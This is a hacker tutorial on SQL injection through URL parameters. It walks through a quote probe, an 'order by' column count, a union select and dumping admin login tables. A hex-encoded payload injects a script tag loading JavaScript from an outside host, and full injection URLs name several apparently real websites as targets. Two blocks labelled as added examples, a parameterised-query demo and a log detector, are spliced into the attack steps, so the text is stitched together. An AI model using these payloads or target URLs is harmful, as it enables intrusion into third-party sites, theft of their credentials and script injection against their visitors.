Tool:
You must have an old version of Firefox ( >4 ), e.g. Firefox 3.6, or Safari.
Hacking Code:
----------------
%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f796f75726a6 176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e3c2f7363726970743e%29%29
Method:
---------
How do we check whether a website is vulnerable?
To check a website for the vulnerability, we do the following:
http://www.targetdomain.com/index.php?id=4′
We can append the ‘ character (or the ” character) to the parameter to check the target website for the vulnerability; this will show some error from the database connection.
Let's say we found a vulnerable site; then we can extract information from the database and gain some confidential data.
First.
-----
We need to find how many columns there are in the database.
http://www.targetdomain.com/index.php?id=4 order by 1–
and we keep increasing the number until we get an error.
http://www.targetdomain.com/index.php?id=4 order by 5–
http://www.targetdomain.com/index.php?id=4 order by 10–
Second.
---------
We need to find the highest ‘order by’ number that does not give an error. For this example, let's assume that I got an error at ‘order by 11–’, which means I then need to replace that 11 with a 10 again (the highest number I could put in without getting any errors). That is the number of columns in the database!
Third.
-------
So let's say there are 10 columns in the database. Now we need to find out which columns are vulnerable to SQL injection. We will use this query.
http://www.targetdomain.com/index.php?id=-4 union select 1,2,3,4,5,6,7,8,9,10–
Notice that I put a single – in front of the id number (id=-4).
Since there is no page with the id -4, it simply clears the site's text for us. That makes it easier for us to find the data that we are looking for.
Okay, let's say the numbers 3, 6 and 9 popped up on the site. These are the vulnerable columns. So, we put this code in any one of the vulnerable columns (I chose 3 for this example):
http://www.targetdomain.com/index.php?id=-4 union select all 1,2,
%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f796f75726a6 176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e3c28f7363726970743e%29%29,4,5,6,7,8, 9,10--
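Why these probes work, and what stops them, shown as an added example (not code from the original post): the same lookup written once with string concatenation and once with input validation plus a bound parameter. The SQLite in-memory database, the function names and the sample row are assumptions made for the demonstration; the column count is 3 instead of 10.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; the table name "news" is taken from the list on this page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.execute("INSERT INTO news VALUES (4, 'Launch', 'We are live')")
    return db

def get_news_vulnerable(db, raw_id):
    # The request value is pasted into the SQL text, so the database parses it as SQL.
    return db.execute("SELECT id, title, body FROM news WHERE id = " + raw_id).fetchall()

def get_news_hardened(db, raw_id):
    # 1) Validate: an article id is a short run of ASCII digits, nothing else.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    # 2) Bind: the value is sent as a parameter and never becomes part of the SQL text.
    return db.execute("SELECT id, title, body FROM news WHERE id = ?", (int(raw_id),)).fetchall()

def outcome(handler, raw_id):
    # What the page would render: rows, or the database error the tutorial looks for.
    try:
        return handler(make_db(), raw_id)
    except sqlite3.Error:
        return "db error"

# The id values used in the steps above (column count reduced to 3 for this table).
PROBES = ["4", "4'", "4 order by 3--", "4 order by 4--", "-4 union select 1,2,3--"]

if __name__ == "__main__":
    for p in PROBES:
        print(repr(p), outcome(get_news_vulnerable, p), outcome(get_news_hardened, p))
```

With the hardened handler every probe returns an empty result and no database error reaches the page, so neither the error signal nor the reflected numbers are available.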
Example website:
--------------------
http://www.madhop.com/en/news.php?act=detail&id=-193 union select all 1,2,3,4,5,%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f7 96f75726a6176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e3c2f7363726970743e%29%29,7 ,8,9,10,11,12,13,14,15,16,17,18,19--
Click that website's table.
Not information_schema, okay :D!!
See the picture below :D
Now you can find the database for this website. To find the username and password, try clicking it, for example: madhop_db
You will find these tables:
* admin_user
* album
* banner
* category
* color_table
* countries
* currency_tbl
* download_detail
* download_list
* gallery_detail
* member
* news
* news_category
* order_detail
* order_list
* product
* product_photo
* province_tbl
* shop
* video
* video_category
* webboard_forum
* webboard_forumen
* webboard_topic
* webboard_topicen
Now we have some table information, and we need to use a little brain to find the right table. :p
Example : admin_user, tblUser, tblAdmin, etc
Click admin_user. Once we have found the actual table (username, password, etc.), click start.
Voilà! We have the admin login. You can find the password using the "read files" method.
Click "read files" at the top of this page and click load file.
You now have the username/password :D
If the data is encrypted, we need to find an MD5 decrypter online. To find the admin, we can use tools like Havij, admin page finder, etc.
EXAMPLE:
-----------
http://www.madhop.com/en/news.php?act=detail&id=-193 union select all 1,2,3,4,5,%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f7 96f75726a6176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e3c2f7363726970743e%29%29,7 ,8,9,10,11,12,13,14,15,16,17,18,19--
http://sju.ca/about/ news.php?id=-80+union+select+all+1,2,%28%280x3c73637269707420747970653d22746578742f6a617661736372697074222 07372633d22687474703a2f2f796f75726a6176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e 3c2f7363726970743e%29%29,4--
http://www.entp.edu.dz/actualite/ news.php?id=-44%20union%20select%20all%201,2,3,4,%28%280x3c73637269707420747970653d22746578742f6a617661736 37269707422207372633d22687474703a2f2f796f75726a6176617363726970742e636f6d2f3131333031323032303231322f7371 6c2e6a73223e3c2f7363726970743e%29%29--
http://www.calponycars.com/ prodDetail.php?prodId=-349%20union%20select%20all%201,2,3,4,5,6,7,8,9,10,11,12,%28%280x3c73637269707420747 970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f796f75726a6176617363726970742e636f6d2f 3131333031323032303231322f73716c2e6a73223e3c2f7363726970743e%29%29--
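Requests shaped like the ones above leave a recognisable trace in web server access logs. The following is an added example, not part of the original post: it scans log lines for the four markers this method produces (trailing quote, order by N, union select, long 0x literal) and groups order by values per client. The log lines, addresses and hex filler are constructed, and the rule names and threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) \S+?\?(\S*) HTTP')
ORDER_BY = re.compile(r"\border\s+by\s+(\d+)", re.I)
RULES = {
    "quote_probe": re.compile(r"=[^&]*['\"]\s*(?:&|$)"),
    "order_by_n": ORDER_BY,
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "long_hex_literal": re.compile(r"\b0x[0-9a-f]{32,}", re.I),
}

HEX = "41" * 20  # constructed filler, stands in for a long hex-encoded string
STAMP = '- - [01/Jan/2024:10:00:00 +0000] "GET /index.php?id='
SAMPLE_LOG = [  # constructed lines in common log format
    f'192.0.2.10 {STAMP}4 HTTP/1.1" 200 5120',
    f'198.51.100.7 {STAMP}4%27 HTTP/1.1" 500 312',
    f'198.51.100.7 {STAMP}4%20order%20by%201-- HTTP/1.1" 200 5120',
    f'198.51.100.7 {STAMP}4%20order%20by%205-- HTTP/1.1" 200 5120',
    f'198.51.100.7 {STAMP}4%20order%20by%2010-- HTTP/1.1" 200 5120',
    f'198.51.100.7 {STAMP}4%20order%20by%2011-- HTTP/1.1" 500 312',
    f'198.51.100.7 {STAMP}-4+union+select+all+1,2,0x{HEX},4-- HTTP/1.1" 200 900',
]

def scan(lines):
    hits, sweep = [], defaultdict(set)
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # no query string, nothing to inspect
        ip, query = m.group(1), unquote_plus(m.group(2))  # decode %20, %27 and +
        tags = sorted(name for name, rx in RULES.items() if rx.search(query))
        for n in ORDER_BY.findall(query):
            sweep[ip].add(int(n))
        if tags:
            hits.append((ip, tags))
    # Three or more distinct ORDER BY positions from one client: column-count sweep.
    sweepers = {ip: sorted(ns) for ip, ns in sweep.items() if len(ns) >= 3}
    return hits, sweepers

if __name__ == "__main__":
    for item in scan(SAMPLE_LOG):
        print(item)
```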
Credit by p4Ng5 H1t4m a.k.a 4p13h Mh-Cr3w